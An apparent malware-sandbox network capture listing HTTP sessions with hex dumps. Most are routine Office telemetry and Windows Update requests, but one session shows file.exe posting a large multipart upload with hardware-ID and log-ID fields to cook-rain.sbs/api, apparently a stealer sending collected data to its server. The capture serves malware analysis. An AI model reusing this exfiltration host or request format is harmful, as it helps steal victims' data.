                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        46192.168.2.64975613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:34 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:34 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                                                                                                        x-ms-request-id: 20caaba8-701e-005c-0363-3bbb94000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093734Z-178bfbc474b9fdhphC1NYCac0n000000017g000000005qr2
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:34 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        47192.168.2.64975813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:35 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:35 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 423
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                        x-ms-request-id: 57b2d8b6-201e-0033-2767-3bb167000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093735Z-178bfbc474bwh9gmhC1NYCy3rs00000001eg0000000012ra
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:35 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        48192.168.2.64976013.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:35 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:36 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:35 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                        x-ms-request-id: ae8c6dce-101e-008d-4280-3b92e5000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093735Z-1777c6cb7544nvmshC1TEBf7qc0000000at0000000003vmd
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:36 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        49192.168.2.64975913.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:35 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:35 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 478
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                        ETag: "0x8DC582B9B233827"
                                                                                                                                                                        x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093735Z-178bfbc474bfw4gbhC1NYCunf4000000018000000000arfh
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:36 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        50192.168.2.64976113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:35 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:35 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                        ETag: "0x8DC582BB046B576"
                                                                                                                                                                        x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093735Z-178bfbc474bwlrhlhC1NYCy3kg000000017000000000c2aw
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:36 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        51192.168.2.64976252.149.20.212443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:36 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cW5bTrG1rw+aTtT&MD=dl6frla3 HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                        2024-11-21 09:37:36 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Expires: -1
                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                        MS-CorrelationId: deb1e21f-6546-45b6-ad3c-e8538b78e059
                                                                                                                                                                        MS-RequestId: 7869aba6-a4e5-4d02-b2bc-cd38669c9ea9
                                                                                                                                                                        MS-CV: MOxjIbLWyE2O3uS0.0
                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:35 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                        2024-11-21 09:37:36 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                        2024-11-21 09:37:36 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        52192.168.2.64976313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:36 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:36 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 400
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                                                                                        x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093736Z-r1d97b99577l6wbzhC1TEB3fwn0000000a80000000009g7e
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:36 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        53192.168.2.649766188.114.97.34434540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:37 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=BLWHBMAJTD0FXY
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 567448
                                                                                                                                                                        Host: cook-rain.sbs
                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: 2d 2d 42 4c 57 48 42 4d 41 4a 54 44 30 46 58 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 30 35 45 31 41 45 31 45 46 38 38 32 44 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 42 4c 57 48 42 4d 41 4a 54 44 30 46 58 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 4c 57 48 42 4d 41 4a 54 44 30 46 58 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 4c
                                                                                                                                                                        Data Ascii: --BLWHBMAJTD0FXYContent-Disposition: form-data; name="hwid"91B05E1AE1EF882D63CFCF7E6C45F838--BLWHBMAJTD0FXYContent-Disposition: form-data; name="pid"1--BLWHBMAJTD0FXYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BL
                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: 02 2c 11 36 05 c4 ea 91 ec 8e db 72 92 30 1f ef cf ce 97 43 ad 2a ae 1f 35 fe 93 2b d1 68 5a e0 86 6d a0 d7 3b 69 90 34 9f dc 48 94 a1 26 49 fd ae 15 64 d1 20 cc b3 b5 dc 68 e8 6d 9f fa 98 80 cb b9 55 c8 3b ad 01 5e 1a 11 d6 e5 08 dd d3 7d 4c 71 5a 30 4b 75 c3 4c 69 f7 c2 93 b8 ce 92 1c 2c ac b7 64 91 5b b4 33 e1 e5 76 3a 6f 72 86 52 25 3b 5d a2 b8 7a 8f 15 9e 35 c7 0a 54 09 d9 35 53 be 1d a6 c2 c6 fc 40 6d c2 b1 d3 6a 1c 9a 3a c1 bc 85 5b 14 03 df 8a f0 2c f6 1d 21 ff 83 b1 6b b7 f4 11 1d d6 10 1e 92 a8 9e b8 d5 18 d0 8e db 7c 47 9c 7b 1f a7 89 8f 46 6d 15 0a 26 9c 62 62 c8 ce 1f 9e 25 5a 1c d7 bd b2 04 39 b6 5b d4 a4 06 d7 2c db f2 a3 38 19 a3 a4 bc d8 f9 3b 23 0a cd 77 59 66 13 8d 9b ba 16 ef d7 d4 33 aa 43 fd 92 20 73 3c 59 3e 38 14 9e 42 1d fd a7 29
                                                                                                                                                                        Data Ascii: ,6r0C*5+hZm;i4H&Id hmU;^}LqZ0KuLi,d[3v:orR%;]z5T5S@mj:[,!k|G{Fm&bb%Z9[,8;#wYf3C s<Y>8B)
                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: 17 58 c8 07 97 0d b5 82 1d 98 17 ce 96 cd 14 22 55 23 92 7b 6b 5a dd 89 93 cf 3a d2 6c 2c b5 70 7e 5c f1 b8 21 81 b0 fb 4e 35 39 96 b4 94 dc 1f e9 7d ff 07 23 4a 96 3f 21 12 32 50 43 29 e5 29 b7 3b fe d7 6d 72 34 cc 33 df 2f 34 dc c7 0e 4a 47 19 05 aa 07 9b 35 04 15 11 30 6c b1 ae c7 5f 56 94 13 22 6b 8c 10 5e e5 44 b8 55 6f 95 fe 3c 9a f3 a4 54 18 da 24 f0 76 b9 da 25 f2 11 86 15 6c 18 a1 01 51 eb 6f 9a ef 88 06 16 ab ae 36 07 d0 d1 bb 86 ca 54 e4 8a b6 e2 77 2a 86 c2 5e 63 8a 03 c1 d6 6f 03 a7 15 ac d6 5f 31 2c 7e 6d c4 da ec 46 ed 50 3d bb bd 91 e7 3f ea ec 9a 9b 18 5f 1a 79 67 fd 71 f9 fa 58 e2 c0 c9 43 03 3f 03 d7 df 32 3c d9 5f 9e fd 96 50 b7 1d 3c 00 2a 16 56 ed 4b 54 ae db 8c b6 a6 06 3e d4 ff f5 df 59 d4 da e6 a0 b4 64 d9 1d bb 9f ff cc 6b 2b fc
                                                                                                                                                                        Data Ascii: X"U#{kZ:l,p~\!N59}#J?!2PC));mr43/4JG50l_V"k^DUo<T$v%lQo6Tw*^co_1,~mFP=?_ygqXC?2<_P<*VKT>Ydk+
                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: 6c 53 ff 55 a9 ef 4f d9 2f 8e 5d e8 95 8a 7e da d8 7d 1c ac f0 4d 94 b5 37 11 24 1e 01 d3 5a 18 69 15 90 32 35 b0 4a a2 ea ef 1c b4 59 24 8c 49 df b8 d1 41 d3 c2 24 ba 81 5e 02 11 03 2e 1f 57 fb 7e 08 93 af 75 5a 83 68 01 74 ce e2 7b 0f 00 e5 48 f8 75 03 c3 52 3e b3 92 7b 46 99 61 f6 81 84 88 16 6d 37 28 41 0b e4 bb 73 54 20 38 9e 40 b9 c4 3c 05 51 15 2e ac 67 23 33 66 f9 13 c1 44 19 74 f9 63 43 d5 e7 dd e4 a9 10 db d9 9b 47 90 ca c3 29 21 46 f9 b2 c1 16 f2 cf b7 26 a6 22 af 07 8a ad 0c 4a f8 eb cf 50 cb 9d 08 90 ca fc 3d 88 02 0c 19 75 77 b6 c8 a9 fa a8 37 05 7b 49 dd 7b 2d d4 72 34 b6 a7 e3 c8 f1 ac dc 2d 81 b7 5e c6 ad 5b f7 b8 0f 51 80 b1 28 dd 2a 0e d3 1f 04 fb 41 4d 03 61 84 45 c0 56 5b 13 18 53 e6 1d be af 01 b8 39 67 45 51 96 3f 7c 83 68 bf 04 bb
                                                                                                                                                                        Data Ascii: lSUO/]~}M7$Zi25JY$IA$^.W~uZht{HuR>{Fam7(AsT 8@<Q.g#3fDtcCG)!F&"JP=uw7{I{-r4-^[Q(*AMaEV[S9gEQ?|h
